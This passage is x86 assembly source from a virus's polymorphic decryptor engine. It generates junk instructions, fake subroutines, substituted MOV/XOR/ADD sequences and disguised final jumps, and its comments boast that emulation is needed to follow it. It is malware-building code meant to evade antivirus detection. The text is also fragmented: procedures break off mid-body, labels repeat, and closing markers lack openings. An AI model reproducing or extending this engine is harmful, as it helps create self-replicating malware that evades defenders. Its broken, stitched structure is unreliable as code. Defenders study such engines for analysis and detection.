; We make: JZ Etiq1 / Garbage / JMP Loop / Etiq1: xxx
@@MakeJZ: mov al, 74h ; Store the opcode of JZ (short)
stosb
inc edi ; Make size for displacement
@@MakeJZ_000:
push dword ptr [ebp+CallsLevel1Ndx] ; Save CALLs indexes
push dword ptr [ebp+CallsLevel2Ndx] ; just in case we have
push dword ptr [ebp+CallsLevel3Ndx] ; to repeat the garbage
; making
jmp @@MakeJZ_001 ; Jump to continue
@@MakeJZ_003:
sub edi, 5 ; Eliminate the size of the "JMP Loop"
@@MakeJZ_001:
mov esi, edi ; Save current insertion address
call DoRandomGarbage ; Make garbage
add edi, 5 ; Add jump size
sub esi, edi ; Get the size of displacement for JZ
neg esi
cmp esi, 5 ; Displacement = size of JMP?
jbe @@MakeJZ_003 ; If it is, repeat (no garbage made)
cmp esi, 7Fh ; Under the maximum displacement?
jbe @@MakeJZ_OK ; If it's below or equal, jump
pop dword ptr [ebp+CallsLevel3Ndx] ; We have to repeat the
pop dword ptr [ebp+CallsLevel2Ndx] ; garbage (too much), so
pop dword ptr [ebp+CallsLevel1Ndx] ; we restore the indexes
; of the calls to eliminate any possible
; call made during this garbage creation
sub edi, esi ; Restore EDI
jmp @@MakeJZ_000 ; Jump and loop
@@MakeJZ_OK: pop eax ; Eliminate the saved call indexes, since
pop eax ; the garbage is made correctly
pop eax
mov eax, esi ; Get the displacement in EAX
neg esi ; Get the index adding in ESI
mov byte ptr [edi+esi-1], al ; Complete the JZ
sub edi, 5 ; Make the JMP
mov al, 0E9h ; Opcode of JMP
stosb ; Store the opcode
jmp @@CompleteJZ_JNZ ; Jump to save the address for later
; completion
;; Since the function Branching is recursive, after this code there will be
;; other branches and "functional code". This means that if we put at this
;; point the subroutines that we want to create, they'll be between code, not
;; at the beginning or at the end of the decryptor, a technique that increases
;; the polymorphism of the engine a lot.
@@ContinueWithFunctionalCode:
xor ecx, ecx
call CompleteCalls ; Complete calls of level 1
mov ecx, 84h
call CompleteCalls ; Complete calls of level 2
mov ecx, 84h*2
call CompleteCalls ; Complete calls of level 3
@@Completed:
mov dword ptr [ebp+CallsLevel1Ndx], 0 ; Release must-be-
mov dword ptr [ebp+CallsLevel2Ndx], 0 ; created calls
mov dword ptr [ebp+CallsLevel3Ndx], 0
;; This function completes the CALLs pointed to by the addresses in the arrays
;; above. Depending on the level of recursivity, we stored the address of that
;; CALL instruction in one of the levels. When we call this function,
;; depending on the value in ECX, we complete them pointing to an already
;; created subroutine (stored in ArrayOfCallsX) or we create a new subroutine
;; and store the address of that new one into ArrayOfCallsX.
;; ECX=0 for Calls level 1, ECX=84h for Calls level 2, ECX=84h*2 for level 3
CompleteCalls proc
mov edx, [ebp+ecx+CallsLevel1Ndx]
shr edx, 2 ; Get the number of calls to complete
push ecx
and cl, 0Fh
shr cl, 2
inc ecx
mov byte ptr [ebp+GarbageRecursivity], cl ; Set the garbage
; recursivity (calls of level
; 3 can't do any CALL, to
; avoid too much recursivity)
pop ecx
@@CompleteCalls:
dec edx ; Have we completed all the calls?
js @@Completed ; If yes, we end
cmp dword ptr [ebp+ecx+ArrayOfCalls1Ndx], 0 ; Is there
; any created subroutine?
jz @@CreateCall ; If not, create a new one directly
call RandomFlags ; Get random flags
jz @@CreateCall ; Create a call with a 50% of probability
@@AnotherRandom:
call Random
and eax, 3Ch
cmp eax, [ebp+ecx+ArrayOfCalls1Ndx]
jae @@AnotherRandom ; Get a random address from the list
; of created subroutines
add ebp, ecx
mov esi, [4*edx+ebp+CallsLevel1]
lea ebx, [esi+4]
sub ebx, [ebp+eax+ArrayOfCalls1]
neg ebx ; EBX=Displacement from the created
; subroutine to the CALL instruction
mov [esi], ebx ; Complete CALL
sub ebp, ecx ; Restore delta offset
jmp @@CompleteCalls ; Loop
@@CreateCall:
cmp dword ptr [ebp+ecx+ArrayOfCalls1Ndx], 80h ; If there are
jz @@AnotherRandom ; too many created subroutines, jump
; to use any created one
add ebp, ecx
mov esi, [4*edx+ebp+CallsLevel1] ; Get the address to the
lea ebx, [esi+4] ; CALL to complete
sub ebx, edi
neg ebx
mov [esi], ebx
sub ebp, ecx
call CreateCALL
CreateCALL proc
add ebp, ecx ; Fix delta offset (we can't put three
; registers inside the brackets :P)
mov ebx, [ebp+ArrayOfCalls1Ndx]
mov [ebp+ebx+ArrayOfCalls1], edi ; Now, set the address of
add ebx, 4 ; storage (EDI) into the array
mov [ebp+ArrayOfCalls1Ndx], ebx ; of created subroutines
sub ebp, ecx ; Restore delta offset
@@AgainCalls: call RandomFlags
jz @@NormalCall
js @@NormalCall ; Simulate a stack frame with a 25%
; probability
cmp byte ptr [ebp+KeyRegister], 5
jz @@NormalCall
mov byte ptr [ebp+DoNormalCall], 0
mov al, 55h ; Insert PUSH EBP/MOV EBP,ESP
stosb
mov ax, 0EC8Bh
stosw
jmp @@NotNormalCall
@@NormalCall:
mov byte ptr [ebp+DoNormalCall], 1
@@NotNormalCall:
mov esi, edi ; ESI=Address of storage
; cmp byte ptr [ebp+GarbageRecursivity], 2
; jnz @@SetNormalGarbage
; mov byte ptr [ebp+SpecialGarbage], 1
; jmp @@ContinueWithCALLContents
@@SetNormalGarbage:
mov byte ptr [ebp+SpecialGarbage], 0
@@ContinueWithCALLContents:
call DoRandomGarbage ; Make a lot of garbage inside the
call DoRandomGarbage ; subroutine (including CALLs to other
call DoRandomGarbage ; subroutines, depending on the
call DoRandomGarbage ; recursivity level)
mov byte ptr [ebp+SpecialGarbage], 0
cmp esi, edi ; Test whether EDI has grown (void
; subroutine)
jz @@NotNormalCall ; If it's void, repeat garbage generation
cmp byte ptr [ebp+DoNormalCall], 1
jz @@EndCall ; If there is a stack frame simulation...
mov al, 5Dh ; ...store POP EBP
stosb
@@EndCall: mov al, 0C3h
stosb ; Store RET
ret
CreateCALL endp
PreCreateCALLs proc
xor ecx, ecx
mov eax, 10h
mov byte ptr [ebp+GarbageRecursivity], 1
@@MakeAnother:
push eax
call RandomFlags
jz @@DontMake
call CreateCALL
@@DontMake: pop eax
dec eax
jnz @@MakeAnother
mov byte ptr [ebp+GarbageRecursivity], 0
ret
PreCreateCALLs endp
;; This function selects any register which isn't ESP. If the selected register
;; doesn't have the "touched" flag active, the register is initialized with
;; DoMOV using a random value. Moreover, the function (like SelectARegister and
;; SelectARegisterWithInit) saves the last register returned, so the next call
;; to these functions won't return the same register as the time before.
SelectAnyRegisterWithInit proc
@@Other: call Random
and al, 7
cmp al, 4
jz @@Other
cmp al, byte ptr [ebp+RegisterSelectedB4]
jz @@Other ; Select a random between 0 and 7 which isn't
; ESP nor the last selected register
SelectReg_Common:
and eax, 0FFh
cmp byte ptr [ebp+eax+TouchedRegisters], 1
jz @@OK ; If the register is "touched", jump
cmp byte ptr [ebp+KeyRegister], al
jz @@Other
push edx
push eax
mov dl, al
call Random
call DoMOV ; Initialize the register with a random value
pop eax
pop edx
mov byte ptr [ebp+eax+TouchedRegisters], 1 ; Set the reg.
; as "touched"
@@OK: mov byte ptr [ebp+RegisterSelectedB4], al ; Save it as the
; "selected before"
ret ; Return
SelectAnyRegisterWithInit endp
;; This function makes the instructions to mask the Index1 with AND
MaskIndex1 proc
mov ecx, Virus_SizePOW2
call Random
and eax, 3
inc eax
sub ecx, eax
call Random
and eax, NOT(Virus_SizePOW2 - 1)
and eax, NOT(Virus_SizePOW2)
or ecx, eax ; ECX=The pure mask, with random bits
; where the register to mask will
; always be 0
mov dl, [ebp+Index1Register]
MaskNdxReg: or dl, dl
jz @@EAX
mov ax, 0E081h ; AND Reg,Value
or ah, dl
stosw ; Store the opcode
jmp @@InsertValue
@@EAX: mov al, 25h ; AND EAX,Value
stosb ; Store the opcode
@@InsertValue: xchg ecx, eax
stosd ; Store the masking value
call DoRandomGarbage ; Make garbage
call DoRandomGarbage
ret ; Return
MaskIndex1 endp
;; This function makes the instructions to mask the Index2 with AND
MaskIndex2 proc
mov ecx, Virus_SizePOW2 - 4
call Random
and eax, NOT(Virus_SizePOW2 - 1)
and eax, NOT(Virus_SizePOW2)
or ecx, eax
mov dl, [ebp+Index2Register] ; ECX=Mask with random bits
; where the register to mask
; will be 0
jmp MaskNdxReg ; Jump to the common part
MaskIndex2 endp
;; This function is common when doing the "functional" code in the branch.
;; What it does is to XOR the Index2 with the Index1, do garbage, make the
;; code to decrypt and do more garbage.
Patch1 proc
mov dh, [ebp+Index1Register]
mov dl, [ebp+Index2Register]
call DoXORRegReg
call DoRandomGarbage
call DoRandomGarbage
call InsertDecryption
call DoRandomGarbage
call DoRandomGarbage
ret
Patch1 endp
;; This function constructs code for the decryption operation. It can make a
;; wide variety of methods, using one or two registers inside the brackets,
;; and using a direct value or a register to decrypt. The decryption is XOR,
;; ADD or SUB. Not in vain, it's one of the largest functions in this engine.
InsertDecryption proc
test byte ptr [ebp+TuaregFlags], 1 ; Use register for key?
jz @@WithKeyReg ; Then jump to there
;; Here we put the decryption address directly, added to the index register
@@Next_02: mov dl, [ebp+KeyRegister]
shl dl, 3
or ah, dl ; Bind the registers to the opcode
or ah, dh
stosw ; Store the opcode
mov eax, [ebp+EncryptedDataBeginAddress] ; Get the addr.
@@IFC_Next_01:
stosd ; Store it
call DoRandomGarbage ; Make garbage
call DoRandomGarbage
ret ; Return
InsertDecryption endp
;; Final jump to the decrypted part. Also with a wide variety of methods; this
;; way there isn't a direct jump to the decrypted part, so the decryptor has
;; to be emulated completely to know where the decryptor jumps after the work
;; is done. Hahahahahahahaha! (devilish laugh :)
DoFinalJMP proc
;; Ways of jumping to the decrypted part:
; Common entry:
; MOV [Address], Value (in many and variated types)
; (optional) XOR/ADD/SUB [Address], Value
;; Jump:
; JMP [Address]
; PUSH [Address] / RET
; MOV Reg,[Address] / JMP Reg
; MOV Reg,Address / JMP [Reg]
;; In the common entry, the value and/or the memory address can be in
;; registers (the value is moved to a random register before using it).
;; PUSH [Memory_Address]/RET
@@PUSH__RET: call DoPUSHMem
call DoRandomGarbage
call DoRandomGarbage
mov al, 0C3h ; AL=opcode of RET
stosb ; Store it
jmp @@Return ; Return
;; JMP [Memory_Address]
@@JMP__: call RandomFlags
jz @@JMP__Direct
call Random
sub ebx, eax
call DoMOV
call DoRandomGarbage
call DoRandomGarbage
mov ax, 0A0FFh
or ah, dl
jmp @@Store_01
@@JMP__Direct:
mov ax, 25FFh ; AX=opcode of JMP [Memory_Address]
@@Store_01: stosw ; Store it
mov eax, ebx
stosd ; Complete the opcode with the memory address
; jmp @@Return
;; This function selects two registers from Index1, Index2 or Counter, and
;; sets them on Index1. The key register remains unchanged, since it's needed
;; for the indexed memory accesses, due to the fact that its value never
;; changes.
SelectOnlyTwoRegs proc
push eax
push edx
@@OtherRandom:
call Random ; Get a random value from 0 to 3
and eax, 03h
cmp al, 2 ; Key register?
jz @@OtherRandom ; If so, then get another random
mov al, byte ptr [ebp+eax+CopyOfUsedRegisters] ; Get the
; register in DL
or eax, 08080800h ; Set the other three as 08 (unreserved)
mov dword ptr [ebp+Index1Register], eax ; Set them as the
; new registers
mov al, byte ptr [ebp+CopyOfUsedRegisters+2] ; Restore the
mov byte ptr [ebp+KeyRegister], al ; key register.
; This must be for the indexed memory writes
pop edx
pop eax
ret ; Return
SelectOnlyTwoRegs endp
;; This heavily used function performs a move operation with the register in
;; DL and the value in EAX. It can do a MOV Reg,Value, a LEA Reg,[Value] or
;; a PUSH Value/Garbage/POP Reg. Sometimes it doesn't give the correct value
;; right at the beginning, so the function adjusts the value with a succession
;; of XORs, ADDs or SUBs to get the correct value.
DoMOV proc
pushad ; Save registers
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
@@RepeatRandom:
push eax
call Random
mov ebx, eax
pop eax
and bl, 7
jz @@MOVDirect
cmp bl, 2
jb @@LEA
jz @@LEA2
cmp bl, 4
jb @@PUSHPOP
jz @@MOVMEM
cmp bl, 5
ja @@RepeatRandom
@@Adj_Next01:
call DoRandomGarbage
pop dword ptr [ebp+@@AdjustTimes]
dec byte ptr [ebp+@@AdjustTimes]
jnz @@Adj_Loop01
@@AdjustTimes db 0
db 3 dup (0) ; Padding
@@MOVDirect:
xchg ebx, eax
mov al, 0B8h
add al, dl
stosb
xchg eax, ebx
stosd
jmp @@End
@@LEA: xchg ebx, eax
mov ax, 058Dh
shl dl, 3
or ah, dl
shr dl, 3
stosw
xchg ebx, eax
stosd
jmp @@End
@@LEA2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@LEA
xchg ebx, eax
mov ax, 008Dh
shl dl, 3
or ah, dl
shr dl, 3
or ah, [ebp+KeyRegister]
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@LEA2_b
cmp ebx, 0FFFFFF80h
jbe @@LEA2_d
@@LEA2_b:
or ah, 40h
stosw
xchg ebx, eax
stosb
jmp @@End
@@LEA2_d:
or ah, 80h
stosw
xchg ebx, eax
stosd
jmp @@End
@@NoRecursives2:
mov eax, ebx
@@NoRecursives:
push eax
call Random
mov ebx, eax
pop eax
and bl, 3
jz @@NoRecursives
cmp bl, 2
jb @@MOVDirect
jz @@LEA
jmp @@LEA2
DoPUSHValue proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectPUSH
call RandomFlags
jz @@DirectPUSH
@@Other: call GetAndReserveVar
or ebx, ebx
jz @@DirectPUSH
call DoMOVMemValue
call DoRandomGarbage
call DoPUSHMem
call ReleaseVar
jmp @@End
@@DirectPUSH:
push eax
cmp eax, 7Fh
jbe @@PUSHByte
cmp eax, 0FFFFFF80h
jae @@PUSHByte
mov al, 68h
stosb
pop eax
stosd
jmp @@End
@@PUSHByte:
mov al, 6Ah
stosb
pop eax
stosb
cmp eax, 1
jz @@SelectINC
cmp eax, -1
jz @@SelectDEC
@@Others:
cmp byte ptr [ebp+FlagNoLEA], 1
jz @@NoLEAs
@@OtherRandom:
push eax
call Random
mov ebx, eax
pop eax
and bl, 7
jz @@ADDDirect
cmp bl, 2
jb @@SUBDirect
jz @@LEA
cmp bl, 4
jb @@LEA2
jz @@MOVMEM
cmp bl, 5
ja @@OtherRandom
@@MOVMEM2: call GetAndReserveVar
or ebx, ebx
jz @@NoRecursives
call DoMOVMemValue
call DoRandomGarbage
call DoADDRegMem
call ReleaseVar
jmp @@End
@@MOVMEM: call GetAndReserveVar
or ebx, ebx
jz @@NoRecursives
neg eax
call DoMOVMemValue
call DoRandomGarbage
call DoSUBRegMem
call ReleaseVar
jmp @@End
@@ADDDirect:
mov ebx, eax
or dl, dl
jz @@ADDDirectEAX
cmp ebx, 7Fh
jbe @@ADDDirectByte
cmp ebx, 0FFFFFF80h
jae @@ADDDirectByte
mov ax, 0C081h
@@CommonWithADD1:
or ah, dl
stosw
xchg ebx, eax
stosd
jmp @@End
@@ADDDirectByte:
mov ax, 0C083h
@@CommonWithADD2:
or ah, dl
stosw
xchg ebx, eax
stosb
jmp @@End
@@ADDDirectEAX:
mov al, 05h
stosb
xchg ebx, eax
stosd
jmp @@End
@@SUBDirect:
neg eax
mov ebx, eax
or dl, dl
jz @@SUBDirectEAX
cmp ebx, 7Fh
jbe @@SUBDirectByte
cmp ebx, 0FFFFFF80h
jae @@SUBDirectByte
mov ax, 0E881h
jmp @@CommonWithADD1
@@SUBDirectByte:
mov ax, 0E883h
jmp @@CommonWithADD2
@@SUBDirectEAX:
mov al, 2Dh
stosb
xchg ebx, eax
stosd
jmp @@End
@@SelectINC2:
call RandomFlags
jz @@INC01
js @@NextNoRecurs
jmp @@INC01
@@SelectINC:
call RandomFlags
jz @@INC01
js @@Others
@@INC01: mov al, 40h
jmp @@CommonWithDEC
@@NoRecursives:
cmp eax, 1
jz @@SelectINC2
cmp eax, -1
jz @@SelectDEC2
@@NextNoRecurs:
cmp byte ptr [ebp+FlagNoLEA], 1
jnz @@NoRecursives2
call RandomFlags
jz @@ADDDirect
jmp @@SUBDirect
@@NoRecursives2:
call RandomFlags
jz @@0_
js @@ADDDirect
jmp @@SUBDirect
@@0_: js @@LEA
jmp @@LEA2
@@SelectDEC2:
call RandomFlags
jz @@DEC01
js @@NextNoRecurs
jmp @@DEC01
@@SelectDEC:
call RandomFlags
jz @@DEC01
js @@Others
@@DEC01: mov al, 48h
@@CommonWithDEC:
or al, dl
stosb
;; Flag that we use when making comparisons, since LEA doesn't modify flags
FlagNoLEA db 0
;; This function only makes a XOR Reg,Value. There isn't any work-around to
;; make XORs (well, you can use the fact that a XOR is
;; [(X AND Y) OR (NEG(X) AND NEG(Y))], which is a bitch to code :).
DoXOR proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectXOR
call GetAndReserveVar
or ebx, ebx
jz @@DirectXOR
call DoMOVMemValue
call DoRandomGarbage
call DoXORRegMem
call ReleaseVar
jmp @@End
@@DirectXOR:
push eax
or dl, dl ; Do we use EAX?
jz @@EAX ; Then use the EAX opcode
mov ax, 0F081h ; Opcode of XOR Reg,Value
or ah, dl ; Bind the register to the opcode
stosw ; Store the opcode
jmp @@J01 ; Jump to continue
@@EAX: mov al, 35h ; Opcode of XOR EAX,Value
stosb ; Store it
@@J01: pop eax ; Get the value to XOR from stack
stosd ; Complete the instruction
@@AdjustMem:
mov ecx, eax ; ECX=Destiny (=EAX)
call Random
and al, 3
jz @@NoRecursives2
mov byte ptr [ebp+@@AdjustTimes], al
call Random
mov edx, eax ; EDX=Initial value
push dword ptr [ebp+@@AdjustTimes]
call DoMOVMemValue ; Move this to [EBX]
pop dword ptr [ebp+@@AdjustTimes]
@@Adj_Loop01:
push dword ptr [ebp+@@AdjustTimes]
call Random
mov esi, eax ; ESI=Number that modifies
@@Adj_Loop02:
call Random
and al, 3
jz @@Adj_Loop02
cmp al, 2
jb @@Adj_ADD
jz @@Adj_XOR
@@Adj_SUB: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@Adj_SUB01
call Random
and al, 0Fh
jnz @@Adj_SUB01
sub edx, [ebp+DecryptKey]
push edx
mov dl, [ebp+KeyRegister]
call DoSUBMemReg
pop edx
jmp @@Adj_Next01
@@Adj_SUB01: sub edx, esi ; Initial=Initial-Random
mov eax, esi
call DoSUBMemValue ; Do SUB [<EBX>],<ESI>
jmp @@Adj_Next01
@@Adj_Next01:
call DoRandomGarbage
pop dword ptr [ebp+@@AdjustTimes]
dec byte ptr [ebp+@@AdjustTimes]
jnz @@Adj_Loop01
@@Adj_Loop03:
call Random
and al, 3
jz @@Adj_Loop03
cmp al, 2
jb @@Adj_FinalADD
jz @@Adj_FinalSUB
@@Adj_FinalXOR:
xor ecx, edx ; EDX=Current value XOR final value
mov eax, ecx
call DoXORMemValue
jmp @@End
@@Adj_FinalADD:
sub ecx, edx
mov eax, ecx
call DoADDMemValue
jmp @@End
@@Adj_FinalSUB:
sub edx, ecx
mov eax, edx
call DoSUBMemValue
jmp @@End
@@AdjustTimes db 0
db 3 dup (0) ; Padding
@@NoRecursives2:
mov eax, ecx
@@NoRecursives:
call RandomFlags
jz @@MOVDirect
jmp @@MOVDirect2
DoADDMemReg proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 01
jmp DoXXXWithMemAndReg
DoADDMemReg endp
DoADDRegMem proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 03
jmp DoXXXWithMemAndReg
DoADDRegMem endp
DoSUBRegMem proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 2Bh
jmp DoXXXWithMemAndReg
DoSUBRegMem endp
DoSUBMemReg proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 29h
jmp DoXXXWithMemAndReg
DoSUBMemReg endp
DoXORRegMem proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 33h
jmp DoXXXWithMemAndReg
DoXORRegMem endp
DoXORMemReg proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 31h
jmp DoXXXWithMemAndReg
DoXORMemReg endp
OpcodeToUseInXXXFunc db 0
DoADDMemValue proc
pushad
push eax
call Random
mov ecx, eax
pop eax
and cl, 3
jz @@ADD
cmp cl, 2
jb @@ADD2
jz @@SUB
@@SUB2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@SUB
neg eax
push eax
mov ax, 2881h
DoXXXMemValue_Common2:
or ah, [ebp+KeyRegister]
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@SUB2b
cmp ebx, 0FFFFFF80h
jae @@SUB2b
or ah, 80h
DoXXXMemValue_Common:
pop ecx
stosw
xchg ebx, eax
stosd
xchg ecx, eax
stosd
jmp @@End
@@SUB2b: or ah, 40h
pop ecx
stosw
xchg ebx, eax
stosb
xchg ecx, eax
stosd
jmp @@End
@@SUB: neg eax
push eax
mov ax, 2D81h
jmp DoXXXMemValue_Common
@@ADD: push eax
mov ax, 0581h
jmp DoXXXMemValue_Common
@@ADD2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@ADD
push eax
mov ax, 0081h
jmp DoXXXMemValue_Common2
DoSUBMemValue proc
push eax
neg eax
call DoADDMemValue
pop eax
ret
DoSUBMemValue endp
DoXORMemValue proc
pushad
call RandomFlags
jz @@XOR
@@XOR2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@XOR
push eax
mov ax, 3081h
jmp DoXXXMemValue_Common2
@@XOR: push eax
mov ax, 3581h
jmp DoXXXMemValue_Common
DoXORMemValue endp
;; This function makes code to move the value of one register to another. This
;; task can be made with:
;; - MOV Reg1,Reg2
;; - LEA Reg1,[Reg2]
;; - PUSH Reg2/Garbage/POP Reg1
;; When calling: DL=Destiny register, DH=Source register
DoMOVRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
call Random
and al, 3
jz @@PUSHPOP
cmp al, 2
jb @@LEA
jz @@MOV
@@MOVMEM: call GetAndReserveVar
or ebx, ebx
jz @@NoRecursives
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoMOVRegMem
call ReleaseVar
jmp @@End
@@PUSHPOP: xchg dh, dl
call DoPUSHReg
call DoRandomGarbage
xchg dh, dl
call DoPOPReg
jmp @@End
@@LEA:
;; Here we make: LEA Reg1,[Reg2]
;; The opcode of instruction LEA is as follows:
;; LEA = 8Dh+ 00(IndexAdding).000(Destiny).000(SourceInBrackets - Not 5)
;; To put EBP in SourceInBrackets, IndexAdding must be 1 or 2.
shl dl, 3 ; Prepare the destiny register to set it to
; the opcode
cmp dh, 5 ; Is the source register EBP?
jz @@LEA_EBP ; If it is, jump
mov ax, 008Dh ; AX=Clean opcode of LEA
or ah, dl ; Set the destiny register
or ah, dh ; Set the register in brackets
stosw ; Store the opcode
jmp @@End ; Jump to return
@@LEA_EBP: mov ax, 458Dh ; Opcode of LEA Reg,[EBP+something]
or ah, dl ; Set the destiny register
stosw ; Store the opcode
xor al, al
stosb ; Store a 0 addition
jmp @@End ; Jump to return
@@NoRecursives:
call RandomFlags
jz @@LEA
jmp @@MOV
EndRecursiveMOVing:
@@End: dec byte ptr [ebp+MOVingRecursLevel]
mov [esp+S_EDI], edi ; Conserve EDI
popad
ret ; Return
DoMOVRegReg endp
MOVingRecursLevel db 0
;; DL=Register to PUSH
DoPUSHReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectPUSH
call RandomFlags
jz @@DirectPUSH
call GetAndReserveVar
or ebx, ebx
jz @@DirectPUSH
call DoMOVMemReg
call DoRandomGarbage
call DoPUSHMem
call ReleaseVar
jmp EndRecursiveMOVing
@@DirectPUSH:
mov al, 50h
add al, dl
stosb
jmp EndRecursiveMOVing
DoPUSHReg endp
DoPOPReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectPOP
call GetAndReserveVar
or ebx, ebx
jz @@DirectPOP
call DoPOPMem
call DoRandomGarbage
call DoMOVRegMem
call ReleaseVar
jmp EndRecursiveMOVing
EndOfDoPUSHMem:
@@End: mov [esp+S_EDI], edi
popad
ret
DoPUSHMem endp
DoPOPMem proc
pushad
call RandomFlags
jz @@WithIndex
@@Direct: mov ax, 058Fh
jmp CommonWithDoPUSH2
@@WithIndex: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@Direct
mov ax, 0808Fh
jmp CommonWithDoPUSH
DoPOPMem endp
DoMOVRegMem proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
@@OtherRandom:
call Random
and al, 3
jz @@OtherRandom
cmp al, 2
jb @@DirectMOV
jz @@DirectMOVIndexed
@@PUSHPOP: call DoPUSHMem
call DoRandomGarbage
call DoPOPReg
jmp EndRecursiveMOVing
@@DirectMOVIndexed:
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@DirectMOV
mov ax, 808Bh
CommonMRMDirectMOV2:
or ah, [ebp+KeyRegister]
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@Cont_01
cmp ebx, 0FFFFFF80h
jb CommonMRMDirectMOV
@@Cont_01: and ah, 07h
shl dl, 3
or ah, dl
or ah, 40h
stosw
mov eax, ebx
stosb
jmp EndRecursiveMOVing
@@NoRecursives:
call RandomFlags
jz @@DirectMOV
jmp @@DirectMOVIndexed
DoMOVRegMem endp
DoMOVMemReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
@@OtherRandom:
call Random
and al, 3
jz @@OtherRandom
cmp al, 2
jb @@DirectMOV
jz @@DirectMOVIndexed
@@NoRecursives:
call RandomFlags
jz @@DirectMOV
jmp @@DirectMOVIndexed
DoMOVMemReg endp
;; This constructs a XOR between two registers. Like DoXOR, it has to be emitted
;; directly, since there are no other ways to express a XOR. Still, two slightly
;; different opcodes can encode it.
;; When we call it: DH=Source register, DL=Destination register
DoXORRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@Direct
call RandomFlags
jz @@Direct
call GetAndReserveVar
or ebx, ebx
jz @@Direct
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoXORRegMem
call ReleaseVar
jmp @@End
EndOfRecursiveMOVing:
@@End: dec byte ptr [ebp+MOVingRecursLevel]
mov [esp+S_EDI], edi
popad
ret
DoXORRegReg endp
DoADDRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
call GetAndReserveVar
or ebx, ebx
jz @@Direct
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoADDRegMem
call ReleaseVar
jmp EndOfRecursiveMOVing
@@NoRecursives:
call RandomFlags
jz @@Direct
jmp @@LEA
DoSUBRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@Direct
call RandomFlags
jz @@Direct
call GetAndReserveVar
or ebx, ebx
jz @@Direct
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoSUBRegMem
call ReleaseVar
jmp EndOfRecursiveMOVing
;; These three functions are invoked through RandomCalling, which calls them in
;; a random order, because the order doesn't matter here. They set the initial
;; value of the Index1, Index2 and Key registers.
SetIndex2Register proc
mov eax, [ebp+InitialValue] ; Get the initial value
mov dl, [ebp+Index2Register] ; Get Index2Register
call DoMOV ; Make a move operation
call DoRandomGarbage ; Make garbage
ret ; Return
SetIndex2Register endp
KeyIsInit db 0
;; This is the most used function of the engine. It calls the function Garbage
;; up to three times; Garbage generates a single garbage instruction (when it
;; doesn't select a recursive type).
DoRandomGarbage proc
push eax
call Random
and eax, 3 ; Get a random number between 0 and 3
call RandomFlags
jz @@Check0
cmp eax, 1
jbe @@End
dec eax
jmp @@Loop
@@Check0: or eax, eax
jz @@End
@@Loop: call Garbage ; Call the main function of garbage
dec eax
jnz @@Loop ; Repeat EAX times
@@End: pop eax ; Restore EAX
ret ; Return
DoRandomGarbage endp
;; The main garbage generator. It can generate garbage of many types, and it
;; can be called recursively (some types of garbage are composed of two or
;; more instructions, so DoRandomGarbage is called in between).
Garbage proc
pushad ; Save all
inc byte ptr [ebp+GarbageRecursivity] ; Increase the number
; of active instances of Garbage
cmp byte ptr [ebp+GarbageRecursivity], 5 ; If recursion is
jz @@Return ; too deep, exit
call RandomFlags ; Do we make garbage?
jz @@Make1
js @@Make1
jp @@DontMake
;; Make INC or DEC. The only forms used are INC/DEC Reg32 and INC/DEC Reg8
@@INCDEC: call RandomFlags
jc @@INC32 ; Make INC Reg32 with 75% probability
js @@INC8 ; Make INC Reg8 with 25% probability
@@INC32: call SelectARegisterWithInit ; Get a non-reserved, initialized
mov dl, al ; register and save it in DL
call Random
and al, 8 ; Get INC if AL=0 or DEC if AL=8
add al, 40h ; Add opcode mask
add al, dl ; Add register mask
stosb ; Store the opcode
jmp @@Return ; Return
;; 8 bits version
@@INC8: call SelectAReg8 ; Get a 8 bits register
cmp al, 8 ; If there are no selectable 8-bit
jz @@Make1 ; registers, select another type of garbage
mov dl, al ; Set the register in DL
call Random
and ah, 8 ; Get INC or DEC
add ah, dl ; Set the register in the second opcode
add ah, 0C0h ; Mask the second opcode for "register"
mov al, 0FEh ; AL=Main opcode. Only /0 (INC) and /1 (DEC) of this
; group are defined for 8-bit operands; the other ModRM.reg values
; exist only in the 32-bit group (FFh), so forms like FEh D0h
; ("CALL AL") raise an invalid-opcode exception. You can play with
